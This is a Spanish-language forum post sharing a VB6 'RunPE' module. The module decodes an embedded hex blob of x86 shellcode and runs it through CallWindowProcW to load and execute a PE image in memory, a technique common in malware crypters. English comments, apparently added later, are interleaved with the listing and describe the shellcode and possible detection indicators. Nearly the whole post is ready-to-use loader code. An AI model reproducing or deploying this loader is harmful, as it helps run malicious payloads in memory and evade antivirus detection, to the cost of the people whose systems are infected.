
RunPE ASM en linea


Desconectado Danyfirex

« en: Abril 30, 2013, 06:40:42 pm »
Bueno, aquí está este RunPE basado en el shellcode de covetous.eyes.


Código: Visual Basic
  1. ' =================================================================
  2. ' =================================================================
  3. ' => Autor: Pink
  4. ' => RunPE ASM en Linea
  5. ' => Uso RunPE(Puntero Base Ejecutable) 'Pointer PE Image
  6. ' => Fecha : 30|04|2013
  7. ' => Todos los Creditos para covetous.eyes
  8. ' => Requisitos: Ejecutable debe tener tabla de relocalizaciones | PE Image must have  relocation table
  9. ' =================================================================
  10. ' =================================================================
  11.  
  12.  
  13. Option Explicit
  14.  
  ' Win32 import from USER32. The API is documented for forwarding a window
  ' message to a window procedure. In this module its only caller is RunPE,
  ' which passes the address of a Byte array as lpPrevWndFunc, so the import
  ' serves as a generic "call this address" primitive. A call to CallWindowProcW
  ' whose first argument points at data rather than at a module's code section
  ' is the indicator worth looking for when reviewing or instrumenting VB6 code.
  15. Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
  16.  
  17.  
  ' RunPE: decodes the hex text in Str_OP into a Byte array and transfers
  ' execution to that array through CallWindowProcW, handing PE_Puntero to the
  ' decoded code as its first argument.
  '
  ' Parameter: PE_Puntero - per the header comment of this listing, a pointer to
  '            the base of a PE image already held in memory; the header also
  '            states the image must carry a relocation table.
  ' Returns:   nothing meaningful; no value is ever assigned to RunPE.
  18. Public Function RunPE(PE_Puntero As Long)
  19. Dim OP_Array() As Byte
  20. Dim Str_OP  As String
  21. Dim i As Long
  22.  
  ' Opaque 32-bit x86 machine code stored as ASCII hex. NOTE(review): the blob
  ' is not disassembled here and should be treated as untrusted code. Byte
  ' patterns visible in the text include 648B0D30000000 (a read of fs:[0x30],
  ' the PEB pointer on 32-bit Windows) and 66813A4D5A / 813F50450000 (compares
  ' against the "MZ" and "PE\0\0" signatures). That is consistent with code
  ' that parses a PE image and locates APIs without using the import table;
  ' confirm by disassembly in an isolated analysis environment.
  ' Because the code sits on disk as hex text, a byte-pattern signature has to
  ' cover the text form in the file as well as the decoded bytes in memory.
  23. Str_OP = "5589E5FF7508E804000000C9C204005589E583EC3C5751508B450483E80B505B8D9BFA020000538F45F7E88F0200008945FB" & _
  24.       "68F066246353FF75FBE8DF0200008945CC6880EFF81553FF75FBE8CE0200008945D4682207E47153FF75FBE8BD0200008945D08" & _
  25.       "D4DCC894DE0FF7508E87100000083F8007462508F45C46A046800301000FF704C6A006AFFFF55CC8945C8FF75C8FF7508FF75C4" & _
  26.       "FF75E0E88F000000FF75C8FF75F7FF75E0E86203000085C07427FF75C4FF75C8E8E5020000FF75C8FF7508FF75C4FF75E0E8BE0" & _
  27.       "000008B75C48B46240345C8FFE058595F8B45E4C9C204005589E583EC0460FF75085A66813A4D5A75108B4A3C01CA813A504500" & _
  28.       "0075038D52048955FC61FF75FC58C9C204005589E5608B55088B750C0372148B7A0C037D108B4A10FCF3A461C9C20C005589E58" & _
  29.       "3EC14608B550C0FB742028945EC8D52148D5A608B425CBA08000000F7E201D88945F8B8280000008B55ECF7E20345F82B451089" & _
  30.       "C18B7D148B7510F3A48B4DEC8B5DF8FF7514FF751053E890FFFFFF83C3284975EE61C9C210005589E583EC186031C08945FC8B5" & _
  31.       "50C0FB742028945E883C2148B421C8945EC8D5A608B425CBA08000000F7E201D88945F0B8280000008B55E8F7E20345F08B5D10" & _
  32.       "29D88945F48B55088D45F8506A02FF75F4FF7514FF520885C074218B4DE88B5DF0FF7510FF751453FF7508E81400000085C0740" & _
  33.       "883C328E2E8FF45FC618B45FCC9C210005589E583EC0C6031DB895DF88B550C8B5A2481E3000000E081FB000000E0750AB84000" & _
  34.       "00008945F4EB598B5A2481E30000006081FB00000060750AB8200000008945F4EB3E8B5A2481E3000000C081FB000000C0750AB" & _
  35.       "8040000008945F4EB238B5A2481E30000004081FB00000040750AB8020000008945F4EB08B8010000008945F48B550C8B420C03" & _
  36.       "45108B4D088D7DFC57FF75F4FF720850FF510885C07403FF45F8618B45F8C9C210005589E583EC0460648B0D300000008B790C8" & _
  37.       "B7F1CFF77088F45FCFF77205B8B3F0FB6431885C075EC0FB60383F84B740583F86B75DF61FF75FC58C9C35589E552518B550868" & _
  38.       "000000005951C1C907310C248A0A8D520184C975F158595AC9C204005589E583EC046068000000008F45FCFF75085E0FB70E81F" & _
  39.       "94D5A0000755D0FB77E3C01F7813F50450000754FFF77785901F18B5918516A005AFF7120588D0406FF305F01F75057FF550C3B" & _
  40.       "45105874108D40048D520183EB0109DB75E359EB1B5FD1E20357240FB70432C1E00201F003471C8B188D1C1E538F45FC61FF75F" & _
  41.       "C58C9C20C005589E5608B55088B5D0C8B5B3029DA745885DB74548B450C8B989C000000035D088B430485C074418D48F8D1E98D" & _
  42.       "7B080FB7075289C2C1E80C8B75086681E2FF0F033301D65A48750789D0C1E810EB064875080FB7C2660106EB054875020116474" & _
  43.       "7E2CC035B04EBB861C9C208005589E583EC1C6031C0408945FC8B55108B423C8D8402800000008B0001D08945E48D7DE8B91400" & _
  44.       "0000B000F3AA8B5DE48D75E889DFB914000000F3A6741853FF7510FF750CFF7508E81400000085C0740883C314EBDAFF45FC618" & _
  45.       "B45FCC9C20C005589E583EC0C608B45148B400C0345108B5D0850FF530485C074638945FC8B55148B020345108945F48B421003" & _
  46.       "45108945F831C98B45F401C88B0085C0743589C325000000807536035D108D5B0289D85153E831FEFFFF50FF750CFF75FCE84AF" & _
  47.       "EFFFF5985C074168B5DF801CB890383C104EBC061B801000000C9C2100061B800000000C9C2100000000000"
  48.  
  49.  
  ' Size the array to one byte per pair of hex digits. The upper bound is
  ' Len/2 - 1; a lower bound of 0 is assumed, since no Option Base statement is
  ' visible in this listing.
  50. ReDim OP_Array((Len(Str_OP) / 2) - 1)
  ' Walk the text two characters at a time; Int(i / 2) maps i = 1, 3, 5, ...
  ' to indexes 0, 1, 2, ... and CByte("&h" & pair) parses each pair as hex.
  51. For i = 1 To Len(Str_OP) - 1 Step 2
  52. OP_Array(Int(i / 2)) = CByte("&h" & Mid(Str_OP, i, 2))
  53. Next
  54.  
  ' VarPtr(OP_Array(0)) is the address of the first decoded byte. Passing it as
  ' lpPrevWndFunc makes USER32 call into the array, so data is executed as code
  ' and PE_Puntero is delivered in the hWnd argument slot.
  ' Defensive note: the call target is array data, not a loaded module's code
  ' section. Where DEP is enforced for the process this call is expected to
  ' fault instead of running. NOTE(review): confirm the DEP policy of the host
  ' process before relying on that.
  55. CallWindowProcW VarPtr(OP_Array(0)), PE_Puntero, 0, 0, 0
  56.  
  57.  
  58.  
  59. End Function

saludos
« Última modificación: Mayo 12, 2014, 02:58:45 pm por Expermicid »

 
